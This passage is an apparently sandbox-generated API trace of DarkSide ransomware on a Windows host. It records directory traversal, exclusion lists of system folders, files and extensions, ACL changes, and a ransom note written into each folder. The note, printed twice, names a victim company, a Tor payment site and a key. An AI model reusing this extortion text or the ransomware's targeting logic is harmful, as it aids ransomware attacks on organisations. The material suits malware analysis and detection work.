dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0167.954] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0167.954] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0167.954] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0167.954] _wcsicmp (_Str1="$recycle.bin", _Str2="Saved Games") returned -79 [0167.954] wcslen (_String="$recycle.bin") returned 0xc [0167.954] _wcsicmp (_Str1="config.msi", _Str2="Saved Games") returned -16 [0167.954] wcslen (_String="config.msi") returned 0xa [0167.954] _wcsicmp (_Str1="$windows.~bt", _Str2="Saved Games") returned -79 [0167.954] wcslen (_String="$windows.~bt") returned 0xc [0167.954] _wcsicmp (_Str1="$windows.~ws", _Str2="Saved Games") returned -79 [0167.954] wcslen (_String="$windows.~ws") returned 0xc [0167.954] _wcsicmp (_Str1="windows", _Str2="Saved Games") returned 4 [0167.954] wcslen (_String="windows") returned 0x7 [0167.954] _wcsicmp (_Str1="appdata", _Str2="Saved Games") returned -18 [0167.954] wcslen (_String="appdata") returned 0x7 [0167.954] _wcsicmp (_Str1="application data", _Str2="Saved Games") returned -18 [0167.954] wcslen (_String="application data") returned 0x10 [0167.954] _wcsicmp (_Str1="boot", _Str2="Saved Games") returned -17 [0167.954] wcslen (_String="boot") returned 0x4 [0167.954] _wcsicmp (_Str1="google", _Str2="Saved Games") returned -12 [0167.954] wcslen (_String="google") returned 0x6 [0167.954] _wcsicmp (_Str1="mozilla", _Str2="Saved Games") returned -6 [0167.954] wcslen (_String="mozilla") returned 0x7 [0167.955] _wcsicmp (_Str1="program files", _Str2="Saved Games") returned -3 [0167.955] wcslen (_String="program files") returned 0xd [0167.955] _wcsicmp (_Str1="program files (x86)", _Str2="Saved Games") returned -3 [0167.955] wcslen (_String="program files (x86)") returned 0x13 [0167.955] _wcsicmp (_Str1="programdata", _Str2="Saved Games") returned -3 [0167.955] wcslen (_String="programdata") returned 0xb [0167.955] _wcsicmp (_Str1="system volume information", _Str2="Saved Games") returned 24 [0167.955] wcslen (_String="system volume information") returned 0x19 [0167.955] _wcsicmp (_Str1="tor browser", _Str2="Saved Games") returned 1 [0167.955] wcslen (_String="tor browser") returned 0xb [0167.955] _wcsicmp (_Str1="windows.old", _Str2="Saved Games") returned 4 [0167.955] wcslen (_String="windows.old") returned 0xb [0167.955] _wcsicmp (_Str1="intel", _Str2="Saved Games") returned -10 [0167.955] wcslen (_String="intel") returned 0x5 [0167.955] _wcsicmp (_Str1="msocache", _Str2="Saved Games") returned -6 [0167.955] wcslen (_String="msocache") returned 0x8 [0167.955] _wcsicmp (_Str1="perflogs", _Str2="Saved Games") returned -3 [0167.955] wcslen (_String="perflogs") returned 0x8 [0167.955] _wcsicmp (_Str1="x64dbg", _Str2="Saved Games") returned 5 [0167.955] wcslen (_String="x64dbg") returned 0x6 [0167.955] _wcsicmp (_Str1="public", _Str2="Saved Games") returned -3 [0167.955] wcslen (_String="public") returned 0x6 [0167.955] _wcsicmp (_Str1="all users", _Str2="Saved Games") returned -18 [0167.955] wcslen (_String="all users") returned 0x9 [0167.955] _wcsicmp (_Str1="default", _Str2="Saved Games") returned -15 [0167.955] wcslen (_String="default") returned 0x7 [0167.955] wcscpy (in: _Dest=0x1d1000, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0167.956] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0167.956] wcscpy (in: _Dest=0x1d1044, _Source="Saved Games" | out: _Dest="Saved Games") returned="Saved Games" [0167.956] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x210e20 [0167.956] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1f8e18 [0167.957] wcscpy (in: _Dest=0x210e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0167.957] GetNamedSecurityInfoW () returned 0x0 [0167.957] SetEntriesInAclW () returned 0x0 [0167.957] SetNamedSecurityInfoW () returned 0x0 [0167.959] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22c428) returned 1 [0167.959] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32eb6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.959] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games")) returned 1 [0167.959] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0167.959] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0167.960] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32eb3c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32eb3c*=0x7ca, lpOverlapped=0x0) returned 1 [0167.961] CloseHandle (hObject=0x1bc) returned 1 [0167.961] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0167.961] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games")) returned 0x11 [0167.961] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="" [0167.961] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned 0x2e [0167.961] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", fInfoLevelId=0x0, lpFindFileData=0x32ed9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed9c) returned 0x154148 [0167.961] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x91d09780, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x91d09780, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.962] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0167.962] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0167.962] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0167.963] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0167.963] wcslen (_String="autorun.inf") returned 0xb [0167.963] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0167.963] wcslen (_String="boot.ini") returned 0x8 [0167.963] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0167.963] wcslen (_String="bootfont.bin") returned 0xc [0167.963] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0167.963] wcslen (_String="bootsect.bak") returned 0xc [0167.963] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0167.963] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91d09780, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x91d09780, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x91d09780, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0167.963] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0167.963] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0167.963] FindClose (in: hFindFile=0x154148 | out: hFindFile=0x154148) returned 1 [0167.963] _wcsicmp (_Str1="backup", _Str2="Saved Games") returned -17 [0167.963] wcslen (_String="backup") returned 0x6 [0167.963] _wcsicmp (_Str1="bak", _Str2="Saved Games") returned -17 [0167.963] wcslen (_String="bak") returned 0x3 [0167.963] _wcsicmp (_Str1="back", _Str2="Saved Games") returned -17 [0167.963] wcslen (_String="back") returned 0x4 [0167.963] _wcsicmp (_Str1="archive", _Str2="Saved Games") returned -18 [0167.963] wcslen (_String="archive") returned 0x7 [0167.963] _wcsicmp (_Str1="bckp", _Str2="Saved Games") returned -17 [0167.964] wcslen (_String="bckp") returned 0x4 [0167.964] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x210e20) returned 1 [0167.964] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1f8e18) returned 1 [0167.964] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0167.964] _wcsicmp (_Str1="$recycle.bin", _Str2="Searches") returned -79 [0167.964] wcslen (_String="$recycle.bin") returned 0xc [0167.964] _wcsicmp (_Str1="config.msi", _Str2="Searches") returned -16 [0167.964] wcslen (_String="config.msi") returned 0xa [0167.964] _wcsicmp (_Str1="$windows.~bt", _Str2="Searches") returned -79 [0167.965] wcslen (_String="$windows.~bt") returned 0xc [0167.965] _wcsicmp (_Str1="$windows.~ws", _Str2="Searches") returned -79 [0167.965] wcslen (_String="$windows.~ws") returned 0xc [0167.965] _wcsicmp (_Str1="windows", _Str2="Searches") returned 4 [0167.965] wcslen (_String="windows") returned 0x7 [0167.965] _wcsicmp (_Str1="appdata", _Str2="Searches") returned -18 [0167.965] wcslen (_String="appdata") returned 0x7 [0167.965] _wcsicmp (_Str1="application data", _Str2="Searches") returned -18 [0167.965] wcslen (_String="application data") returned 0x10 [0167.965] _wcsicmp (_Str1="boot", _Str2="Searches") returned -17 [0167.965] wcslen (_String="boot") returned 0x4 [0167.965] _wcsicmp (_Str1="google", _Str2="Searches") returned -12 [0167.965] wcslen (_String="google") returned 0x6 [0167.965] _wcsicmp (_Str1="mozilla", _Str2="Searches") returned -6 [0167.965] wcslen (_String="mozilla") returned 0x7 [0167.965] _wcsicmp (_Str1="program files", _Str2="Searches") returned -3 [0167.965] wcslen (_String="program files") returned 0xd [0167.965] _wcsicmp (_Str1="program files (x86)", _Str2="Searches") returned -3 [0167.965] wcslen (_String="program files (x86)") returned 0x13 [0167.965] _wcsicmp (_Str1="programdata", _Str2="Searches") returned -3 [0167.965] wcslen (_String="programdata") returned 0xb [0167.965] _wcsicmp (_Str1="system volume information", _Str2="Searches") returned 20 [0167.965] wcslen (_String="system volume information") returned 0x19 [0167.965] _wcsicmp (_Str1="tor browser", _Str2="Searches") returned 1 [0167.965] wcslen (_String="tor browser") returned 0xb [0167.965] _wcsicmp (_Str1="windows.old", _Str2="Searches") returned 4 [0167.966] wcslen (_String="windows.old") returned 0xb [0167.966] _wcsicmp (_Str1="intel", _Str2="Searches") returned -10 [0167.966] wcslen (_String="intel") returned 0x5 [0167.966] _wcsicmp (_Str1="msocache", _Str2="Searches") returned -6 [0167.966] wcslen (_String="msocache") returned 0x8 [0167.966] _wcsicmp (_Str1="perflogs", _Str2="Searches") returned -3 [0167.966] wcslen (_String="perflogs") returned 0x8 [0167.966] _wcsicmp (_Str1="x64dbg", _Str2="Searches") returned 5 [0167.966] wcslen (_String="x64dbg") returned 0x6 [0167.966] _wcsicmp (_Str1="public", _Str2="Searches") returned -3 [0167.966] wcslen (_String="public") returned 0x6 [0167.966] _wcsicmp (_Str1="all users", _Str2="Searches") returned -18 [0167.966] wcslen (_String="all users") returned 0x9 [0167.966] _wcsicmp (_Str1="default", _Str2="Searches") returned -15 [0167.966] wcslen (_String="default") returned 0x7 [0167.966] wcscpy (in: _Dest=0x1d1000, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0167.966] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0167.966] wcscpy (in: _Dest=0x1d1044, _Source="Searches" | out: _Dest="Searches") returned="Searches" [0167.966] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1f8e18 [0167.966] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x210e20 [0167.967] wcscpy (in: _Dest=0x1f8e18, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0167.967] GetNamedSecurityInfoW () returned 0x0 [0167.968] SetEntriesInAclW () returned 0x0 [0167.968] SetNamedSecurityInfoW () returned 0x0 [0167.970] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22c4c8) returned 1 [0167.970] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32eb6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.970] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches")) returned 1 [0167.971] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0167.971] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0167.971] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32eb3c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32eb3c*=0x7ca, lpOverlapped=0x0) returned 1 [0167.972] CloseHandle (hObject=0x1bc) returned 1 [0167.972] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0167.972] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches")) returned 0x11 [0167.972] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="" [0167.972] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 0x2b [0167.972] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", fInfoLevelId=0x0, lpFindFileData=0x32ed9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed9c) returned 0x154148 [0167.973] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x91d09780, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x91d09780, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.041] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0168.041] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0168.041] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0168.041] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0168.041] wcslen (_String="autorun.inf") returned 0xb [0168.041] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0168.041] wcslen (_String="boot.ini") returned 0x8 [0168.041] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0168.041] wcslen (_String="bootfont.bin") returned 0xc [0168.041] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0168.041] wcslen (_String="bootsect.bak") returned 0xc [0168.041] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0168.041] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0168.041] _wcsicmp (_Str1="Everywhere.search-ms", _Str2="README.c06622a1.TXT") returned -13 [0168.041] wcsstr (_Str="Everywhere.search-ms", _SubStr="README") returned 0x0 [0168.041] _wcsicmp (_Str1="autorun.inf", _Str2="Everywhere.search-ms") returned -4 [0168.041] wcslen (_String="autorun.inf") returned 0xb [0168.041] _wcsicmp (_Str1="boot.ini", _Str2="Everywhere.search-ms") returned -3 [0168.042] wcslen (_String="boot.ini") returned 0x8 [0168.042] _wcsicmp (_Str1="bootfont.bin", _Str2="Everywhere.search-ms") returned -3 [0168.042] wcslen (_String="bootfont.bin") returned 0xc [0168.042] _wcsicmp (_Str1="bootsect.bak", _Str2="Everywhere.search-ms") returned -3 [0168.042] wcslen (_String="bootsect.bak") returned 0xc [0168.042] _wcsicmp (_Str1="desktop.ini", _Str2="Everywhere.search-ms") returned -1 [0168.042] wcslen (_String="desktop.ini") returned 0xb [0168.042] _wcsicmp (_Str1="iconcache.db", _Str2="Everywhere.search-ms") returned 4 [0168.042] wcslen (_String="iconcache.db") returned 0xc [0168.042] _wcsicmp (_Str1="ntldr", _Str2="Everywhere.search-ms") returned 9 [0168.042] wcslen (_String="ntldr") returned 0x5 [0168.042] _wcsicmp (_Str1="ntuser.dat", _Str2="Everywhere.search-ms") returned 9 [0168.042] wcslen (_String="ntuser.dat") returned 0xa [0168.042] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Everywhere.search-ms") returned 9 [0168.042] wcslen (_String="ntuser.dat.log") returned 0xe [0168.042] _wcsicmp (_Str1="ntuser.ini", _Str2="Everywhere.search-ms") returned 9 [0168.042] wcslen (_String="ntuser.ini") returned 0xa [0168.042] _wcsicmp (_Str1="thumbs.db", _Str2="Everywhere.search-ms") returned 15 [0168.042] wcslen (_String="thumbs.db") returned 0x9 [0168.042] _wcsicmp (_Str1="386", _Str2="search-ms") returned -64 [0168.042] wcslen (_String="386") returned 0x3 [0168.042] _wcsicmp (_Str1="adv", _Str2="search-ms") returned -18 [0168.042] wcslen (_String="adv") returned 0x3 [0168.042] _wcsicmp (_Str1="ani", _Str2="search-ms") returned -18 [0168.042] wcslen (_String="ani") returned 0x3 [0168.042] _wcsicmp (_Str1="bat", _Str2="search-ms") returned -17 [0168.042] wcslen (_String="bat") returned 0x3 [0168.042] _wcsicmp (_Str1="bin", _Str2="search-ms") returned -17 [0168.042] wcslen (_String="bin") returned 0x3 [0168.043] _wcsicmp (_Str1="cab", _Str2="search-ms") returned -16 [0168.043] wcslen (_String="cab") returned 0x3 [0168.043] _wcsicmp (_Str1="cmd", _Str2="search-ms") returned -16 [0168.043] wcslen (_String="cmd") returned 0x3 [0168.043] _wcsicmp (_Str1="com", _Str2="search-ms") returned -16 [0168.043] wcslen (_String="com") returned 0x3 [0168.043] _wcsicmp (_Str1="cpl", _Str2="search-ms") returned -16 [0168.043] wcslen (_String="cpl") returned 0x3 [0168.043] _wcsicmp (_Str1="cur", _Str2="search-ms") returned -16 [0168.043] wcslen (_String="cur") returned 0x3 [0168.043] _wcsicmp (_Str1="deskthemepack", _Str2="search-ms") returned -15 [0168.043] wcslen (_String="deskthemepack") returned 0xd [0168.043] _wcsicmp (_Str1="diagcab", _Str2="search-ms") returned -15 